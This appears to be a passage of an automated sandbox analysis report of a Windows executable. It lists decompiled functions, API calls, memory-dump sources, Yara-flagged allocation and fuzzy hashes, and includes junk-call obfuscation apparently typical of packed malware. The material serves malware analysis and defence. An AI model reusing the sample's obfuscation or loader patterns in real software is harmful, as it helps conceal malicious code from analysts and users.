                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                    • Opcode ID: 766d3840e78fbb1a24809f053325a958ed2ca844d566dde5a461389ceb829697
                                                                                                                                    • Instruction ID: 3429ea260bacc9aca5e2efb8f8b52dd3e1ed4d7faadcbd19d9b3fb9a5458997d
                                                                                                                                    • Opcode Fuzzy Hash: 766d3840e78fbb1a24809f053325a958ed2ca844d566dde5a461389ceb829697
                                                                                                                                    • Instruction Fuzzy Hash: 0FD05E72A903085EEB105FB1BC097633BDCA388395F144836FA1CDA190E675C6809584
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 108 40d867-40d869 call 40d7f5 110 40d86e-40d86f 108->110
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040D867() {
                                                                                                                                    				void* _t1;
                                                                                                                                    
                                                                                                                                    				_t1 = E0040D7F5(0); // executed
                                                                                                                                    				return _t1;
                                                                                                                                    			}




                                                                                                                                    0x0040d869
                                                                                                                                    0x0040d86f

                                                                                                                                    APIs
                                                                                                                                    • __encode_pointer.LIBCMT ref: 0040D869
                                                                                                                                      • Part of subcall function 0040D7F5: TlsGetValue.KERNEL32(00000000,?,0040D86E,00000000,004182E3,0060EE08,00000000,00000314,?,00410368,0060EE08,Microsoft Visual C++ Runtime Library,00012010), ref: 0040D807
                                                                                                                                      • Part of subcall function 0040D7F5: TlsGetValue.KERNEL32(00000001,?,0040D86E,00000000,004182E3,0060EE08,00000000,00000314,?,00410368,0060EE08,Microsoft Visual C++ Runtime Library,00012010), ref: 0040D81E
                                                                                                                                      • Part of subcall function 0040D7F5: RtlEncodePointer.NTDLL(00000000,?,0040D86E,00000000,004182E3,0060EE08,00000000,00000314,?,00410368,0060EE08,Microsoft Visual C++ Runtime Library,00012010), ref: 0040D85C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2585649348-0
                                                                                                                                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                    • Instruction ID: 3366794a864334acbafa29f73362f773849a7ad0f839d4923dcede9f05d70a43
                                                                                                                                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 111 926485-9264bf call 926798 114 9264c1-9264f4 VirtualAlloc call 926512 111->114 115 92650d 111->115 117 9264f9-92650b 114->117 115->115 117->115
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009264D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, Offset: 00926000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_926000_6246.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction ID: 9902dfd50e1facf289594598ab831320e463a52c3f4143e4fc1957d07940e0b2
                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction Fuzzy Hash: 74113C79A00208EFDB01DF98C985E99BBF5AF08350F058094F9489B362D371EA90DF80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00413295(signed int __eax, void* __esi) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				char _v20;
                                                                                                                                    				signed int _t142;
                                                                                                                                    				signed int _t145;
                                                                                                                                    				signed int _t148;
                                                                                                                                    				signed int _t151;
                                                                                                                                    				signed int _t154;
                                                                                                                                    				signed int _t157;
                                                                                                                                    				signed int _t159;
                                                                                                                                    				signed int _t162;
                                                                                                                                    				signed int _t165;
                                                                                                                                    				signed int _t168;
                                                                                                                                    				signed int _t171;
                                                                                                                                    				signed int _t174;
                                                                                                                                    				signed int _t177;
                                                                                                                                    				signed int _t180;
                                                                                                                                    				signed int _t183;
                                                                                                                                    				signed int _t186;
                                                                                                                                    				signed int _t189;
                                                                                                                                    				signed int _t192;
                                                                                                                                    				signed int _t195;
                                                                                                                                    				signed int _t198;
                                                                                                                                    				signed int _t201;
                                                                                                                                    				signed int _t204;
                                                                                                                                    				signed int _t207;
                                                                                                                                    				signed int _t210;
                                                                                                                                    				signed int _t213;
                                                                                                                                    				signed int _t216;
                                                                                                                                    				signed int _t219;
                                                                                                                                    				signed int _t222;
                                                                                                                                    				signed int _t225;
                                                                                                                                    				signed int _t228;
                                                                                                                                    				signed int _t231;
                                                                                                                                    				signed int _t234;
                                                                                                                                    				signed int _t237;
                                                                                                                                    				signed int _t240;
                                                                                                                                    				signed int _t243;
                                                                                                                                    				signed int _t246;
                                                                                                                                    				signed int _t249;
                                                                                                                                    				signed int _t252;
                                                                                                                                    				signed int _t255;
                                                                                                                                    				signed int _t258;
                                                                                                                                    				signed int _t261;
                                                                                                                                    				signed int _t264;
                                                                                                                                    				signed int _t267;
                                                                                                                                    				signed int _t270;
                                                                                                                                    				signed int _t276;
                                                                                                                                    
                                                                                                                                    				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                                                                                                                                    				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                                                                                                                                    				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                                                                                                                                    				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                                                                                                                                    				if(__esi != 0) {
                                                                                                                                    					_v16 = _v16 & 0x00000000;
                                                                                                                                    					_v20 = __eax;
                                                                                                                                    					_t142 = E00412A40(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                                                                                                                                    					_t145 = E00412A40(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                                                                                                                                    					_t148 = E00412A40(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                                                                                                                                    					_t151 = E00412A40(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                                                                                                                                    					_t154 = E00412A40(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                                                                                                                                    					_t157 = E00412A40(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                                                                                                                                    					_t159 = E00412A40(_t279,  &_v20, 1, _v8, 0x37, __esi);
                                                                                                                                    					_t162 = E00412A40(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                                                                                                                                    					_t165 = E00412A40(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                                                                                                                                    					_t168 = E00412A40(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                                                                                                                                    					_t171 = E00412A40(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                                                                                                                                    					_t174 = E00412A40(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                                                                                                                                    					_t177 = E00412A40(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                                                                                                                                    					_t180 = E00412A40(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                                                                                                                                    					_t183 = E00412A40(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                                                                                                                                    					_t186 = E00412A40(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                                                                                                                                    					_t189 = E00412A40(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                                                                                                                                    					_t192 = E00412A40(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                                                                                                                                    					_t195 = E00412A40(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                                                                                                                                    					_t198 = E00412A40(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                                                                                                                                    					_t201 = E00412A40(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                                                                                                                                    					_t204 = E00412A40(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                                                                                                                                    					_t207 = E00412A40(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                                                                                                                                    					_t210 = E00412A40(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                                                                                                                                    					_t213 = E00412A40(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                                                                                                                                    					_t216 = E00412A40(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                                                                                                                                    					_t219 = E00412A40(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                                                                                                                                    					_t222 = E00412A40(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                                                                                                                                    					_t225 = E00412A40(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                                                                                                                                    					_t228 = E00412A40(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                                                                                                                                    					_t231 = E00412A40(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                                                                                                                                    					_t234 = E00412A40(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                                                                                                                                    					_t237 = E00412A40(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                                                                                                                                    					_t240 = E00412A40(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                                                                                                                                    					_t243 = E00412A40(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                                                                                                                                    					_t246 = E00412A40(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                                                                                                                                    					_t249 = E00412A40(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                                                                                                                                    					_t252 = E00412A40(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                                                                                                                                    					_t255 = E00412A40(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                                                                                                                                    					_t258 = E00412A40(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                                                                                                                                    					_t261 = E00412A40(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                                                                                                                                    					_t264 = E00412A40(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                                                                                                                                    					_t267 = E00412A40(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                                                                                                                                    					_t276 = _v12;
                                                                                                                                    					_t270 = E00412A40(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                                                                                                                                    					 *(__esi + 0xac) = _t276;
                                                                                                                                    					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                                                                                                                                    				} else {
                                                                                                                                    					return __eax | 0xffffffff;
                                                                                                                                    				}
                                                                                                                                    			}




















































                                                                                                                                    0x0041329d
                                                                                                                                    0x004132a1
                                                                                                                                    0x004132a5
                                                                                                                                    0x004132a8
                                                                                                                                    0x004132ad
                                                                                                                                    0x004132b4
                                                                                                                                    0x004132ba
                                                                                                                                    0x004132cc
                                                                                                                                    0x004132e1
                                                                                                                                    0x004132f6
                                                                                                                                    0x0041330b
                                                                                                                                    0x00413323
                                                                                                                                    0x00413338
                                                                                                                                    0x0041334a
                                                                                                                                    0x0041335f
                                                                                                                                    0x00413377
                                                                                                                                    0x0041338c
                                                                                                                                    0x004133a1
                                                                                                                                    0x004133b6
                                                                                                                                    0x004133ce
                                                                                                                                    0x004133e3
                                                                                                                                    0x004133f8
                                                                                                                                    0x0041340d
                                                                                                                                    0x00413425
                                                                                                                                    0x0041343a
                                                                                                                                    0x0041344f
                                                                                                                                    0x00413464
                                                                                                                                    0x0041347c
                                                                                                                                    0x00413491
                                                                                                                                    0x004134a6
                                                                                                                                    0x004134bb
                                                                                                                                    0x004134d3
                                                                                                                                    0x004134e8
                                                                                                                                    0x004134fd
                                                                                                                                    0x00413512
                                                                                                                                    0x0041352a
                                                                                                                                    0x0041353f
                                                                                                                                    0x00413554
                                                                                                                                    0x00413569
                                                                                                                                    0x00413584
                                                                                                                                    0x0041359c
                                                                                                                                    0x004135b4
                                                                                                                                    0x004135cc
                                                                                                                                    0x004135e7
                                                                                                                                    0x004135ff
                                                                                                                                    0x00413617
                                                                                                                                    0x0041362f
                                                                                                                                    0x0041364a
                                                                                                                                    0x00413662
                                                                                                                                    0x0041367d
                                                                                                                                    0x00413690
                                                                                                                                    0x0041369a
                                                                                                                                    0x004136a7
                                                                                                                                    0x004136af
                                                                                                                                    0x004132af
                                                                                                                                    0x004132b3
                                                                                                                                    0x004132b3

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___getlocaleinfo
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1937885557-0
                                                                                                                                    • Opcode ID: a733a845800b9d0324a0597bd19bae0573c949fb87b203669346ded8062b8147
                                                                                                                                    • Instruction ID: 0f4cb0689905d3790c34114b834322808ecec40b13ce8e39cd25ec5139ebad95
                                                                                                                                    • Opcode Fuzzy Hash: a733a845800b9d0324a0597bd19bae0573c949fb87b203669346ded8062b8147
                                                                                                                                    • Instruction Fuzzy Hash: 84E10EB294064DBEEF21DAF1CD81DFF77BDEB04388F14082AB215D3451EAB4AA159760
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E0040B33B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                    				intOrPtr _v0;
                                                                                                                                    				void* _v804;
                                                                                                                                    				intOrPtr _v808;
                                                                                                                                    				intOrPtr _v812;
                                                                                                                                    				intOrPtr _t6;
                                                                                                                                    				intOrPtr _t12;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				long _t17;
                                                                                                                                    				intOrPtr _t21;
                                                                                                                                    				intOrPtr _t22;
                                                                                                                                    				intOrPtr _t25;
                                                                                                                                    				intOrPtr _t26;
                                                                                                                                    				intOrPtr _t27;
                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                    				void* _t34;
                                                                                                                                    
                                                                                                                                    				_t27 = __esi;
                                                                                                                                    				_t26 = __edi;
                                                                                                                                    				_t25 = __edx;
                                                                                                                                    				_t22 = __ecx;
                                                                                                                                    				_t21 = __ebx;
                                                                                                                                    				_t6 = __eax;
                                                                                                                                    				_t34 = _t22 -  *0x4b3ca8; // 0x7143e159
                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                    					asm("repe ret");
                                                                                                                                    				}
                                                                                                                                    				 *0x60f460 = _t6;
                                                                                                                                    				 *0x60f45c = _t22;
                                                                                                                                    				 *0x60f458 = _t25;
                                                                                                                                    				 *0x60f454 = _t21;
                                                                                                                                    				 *0x60f450 = _t27;
                                                                                                                                    				 *0x60f44c = _t26;
                                                                                                                                    				 *0x60f478 = ss;
                                                                                                                                    				 *0x60f46c = cs;
                                                                                                                                    				 *0x60f448 = ds;
                                                                                                                                    				 *0x60f444 = es;
                                                                                                                                    				 *0x60f440 = fs;
                                                                                                                                    				 *0x60f43c = gs;
                                                                                                                                    				asm("pushfd");
                                                                                                                                    				_pop( *0x60f470);
                                                                                                                                    				 *0x60f464 =  *_t31;
                                                                                                                                    				 *0x60f468 = _v0;
                                                                                                                                    				 *0x60f474 =  &_a4;
                                                                                                                                    				 *0x60f3b0 = 0x10001;
                                                                                                                                    				 *0x60f364 =  *0x60f468;
                                                                                                                                    				 *0x60f358 = 0xc0000409;
                                                                                                                                    				 *0x60f35c = 1;
                                                                                                                                    				_t12 =  *0x4b3ca8; // 0x7143e159
                                                                                                                                    				_v812 = _t12;
                                                                                                                                    				_t13 =  *0x4b3cac; // 0x8ebc1ea6
                                                                                                                                    				_v808 = _t13;
                                                                                                                                    				 *0x60f3a8 = IsDebuggerPresent();
                                                                                                                                    				_push(1);
                                                                                                                                    				E0040ECBC(_t14);
                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                    				_t17 = UnhandledExceptionFilter(0x4027c4);
                                                                                                                                    				if( *0x60f3a8 == 0) {
                                                                                                                                    					_push(1);
                                                                                                                                    					E0040ECBC(_t17);
                                                                                                                                    				}
                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                    			}


















                                                                                                                                    0x0040b33b
                                                                                                                                    0x0040b33b
                                                                                                                                    0x0040b33b
                                                                                                                                    0x0040b33b
                                                                                                                                    0x0040b33b
                                                                                                                                    0x0040b33b
                                                                                                                                    0x0040b33b
                                                                                                                                    0x0040b341
                                                                                                                                    0x0040b343
                                                                                                                                    0x0040b343
                                                                                                                                    0x0041319a
                                                                                                                                    0x0041319f
                                                                                                                                    0x004131a5
                                                                                                                                    0x004131ab
                                                                                                                                    0x004131b1
                                                                                                                                    0x004131b7
                                                                                                                                    0x004131bd
                                                                                                                                    0x004131c4
                                                                                                                                    0x004131cb
                                                                                                                                    0x004131d2
                                                                                                                                    0x004131d9
                                                                                                                                    0x004131e0
                                                                                                                                    0x004131e7
                                                                                                                                    0x004131e8
                                                                                                                                    0x004131f1
                                                                                                                                    0x004131f9
                                                                                                                                    0x00413201
                                                                                                                                    0x0041320c
                                                                                                                                    0x0041321b
                                                                                                                                    0x00413220
                                                                                                                                    0x0041322a
                                                                                                                                    0x00413234
                                                                                                                                    0x00413239
                                                                                                                                    0x0041323f
                                                                                                                                    0x00413244
                                                                                                                                    0x00413250
                                                                                                                                    0x00413255
                                                                                                                                    0x00413257
                                                                                                                                    0x0041325f
                                                                                                                                    0x0041326a
                                                                                                                                    0x00413277
                                                                                                                                    0x00413279
                                                                                                                                    0x0041327b
                                                                                                                                    0x00413280
                                                                                                                                    0x00413294

                                                                                                                                    APIs
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0041324A
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041325F
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(004027C4), ref: 0041326A
                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00413286
                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0041328D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                    • Opcode ID: 3fe46e2ee8d140abb108a41043e457e9f978e3dc10f8bd3ea591f13667ab647f
                                                                                                                                    • Instruction ID: 7d695d5be5200831f719d84d69d86fc76a8cf4499fb710716fb0e5eace833fe5
                                                                                                                                    • Opcode Fuzzy Hash: 3fe46e2ee8d140abb108a41043e457e9f978e3dc10f8bd3ea591f13667ab647f
                                                                                                                                    • Instruction Fuzzy Hash: 02210574880304DFD724EF69E9886473BF6BB08715F10203AE908A7BB2E7746585CF5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0041165B() {
                                                                                                                                    
                                                                                                                                    				SetUnhandledExceptionFilter(E00411619);
                                                                                                                                    				return 0;
                                                                                                                                    			}



                                                                                                                                    0x00411660
                                                                                                                                    0x00411668

                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00011619), ref: 00411660
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: bef7ec98776cd5de7414b74b9fc38e8969f068617fcab0dbf3426f92692a093a
                                                                                                                                    • Instruction ID: f05ebd717221d1ea3cfebe93364054491c24fe70f09b93435c330bceaace18c3
                                                                                                                                    • Opcode Fuzzy Hash: bef7ec98776cd5de7414b74b9fc38e8969f068617fcab0dbf3426f92692a093a
                                                                                                                                    • Instruction Fuzzy Hash: 3C90027425120087DB046B705D0D64566985A8D70A7594871A202D8174EF7540405959
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, Offset: 00926000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_926000_6246.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                    • Instruction ID: d4feb5c7f3bf3368fc876925f77e5da3e8a11d956ee5539d615fde298854a07a
                                                                                                                                    • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                    • Instruction Fuzzy Hash: 6B31693580A2929FCB15CEB0E8D0AB5FB75EF87324F1885DCC0819B10AD3255046C794
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                    			E0040492D(intOrPtr _a4) {
                                                                                                                                    				struct _OSVERSIONINFOEXA _v160;
                                                                                                                                    				char _v1184;
                                                                                                                                    				char _v2208;
                                                                                                                                    				intOrPtr _t8;
                                                                                                                                    				intOrPtr _t21;
                                                                                                                                    				void* _t24;
                                                                                                                                    
                                                                                                                                    				if( *0x60e9b0 == 0x37) {
                                                                                                                                    					__imp__GetComputerNameExW(0, 0, 0, _t24);
                                                                                                                                    					FindResourceA(0, 0, 0);
                                                                                                                                    					IsBadReadPtr(0, 0);
                                                                                                                                    					lstrlenW(L"Jefub");
                                                                                                                                    					DeleteFileA("vucumayidomeyutebapinovazagoholedojugitonigeku");
                                                                                                                                    					GetWindowsDirectoryA( &_v1184, 0);
                                                                                                                                    					MapViewOfFileEx(0, 0, 0, 0, 0, 0);
                                                                                                                                    					GlobalGetAtomNameA(0,  &_v2208, 0);
                                                                                                                                    					DebugBreak();
                                                                                                                                    					LocalSize(0);
                                                                                                                                    					_push(0);
                                                                                                                                    					VerifyVersionInfoA( &_v160, 0, 0);
                                                                                                                                    				}
                                                                                                                                    				_t8 = _a4;
                                                                                                                                    				_t21 =  *0x60e9b4; // 0x41ecda
                                                                                                                                    				_t6 = _t8 + 0x38d6; // 0x36c3f2ff
                                                                                                                                    				 *((char*)( *0x60932c + _t8)) =  *((intOrPtr*)(_t21 + _t6));
                                                                                                                                    				return _t8;
                                                                                                                                    			}









                                                                                                                                    0x0040493d
                                                                                                                                    0x00404945
                                                                                                                                    0x0040494e
                                                                                                                                    0x00404956
                                                                                                                                    0x00404961
                                                                                                                                    0x0040496c
                                                                                                                                    0x0040497a
                                                                                                                                    0x00404986
                                                                                                                                    0x00404995
                                                                                                                                    0x0040499b
                                                                                                                                    0x004049a2
                                                                                                                                    0x004049a8
                                                                                                                                    0x004049b2
                                                                                                                                    0x004049b8
                                                                                                                                    0x004049b9
                                                                                                                                    0x004049bc
                                                                                                                                    0x004049c2
                                                                                                                                    0x004049cf
                                                                                                                                    0x004049d3

                                                                                                                                    APIs
                                                                                                                                    • GetComputerNameExW.KERNEL32(00000000,00000000,00000000), ref: 00404945
                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 0040494E
                                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,00000000), ref: 00404956
                                                                                                                                    • lstrlenW.KERNEL32(Jefub), ref: 00404961
                                                                                                                                    • DeleteFileA.KERNEL32(vucumayidomeyutebapinovazagoholedojugitonigeku), ref: 0040496C
                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000000), ref: 0040497A
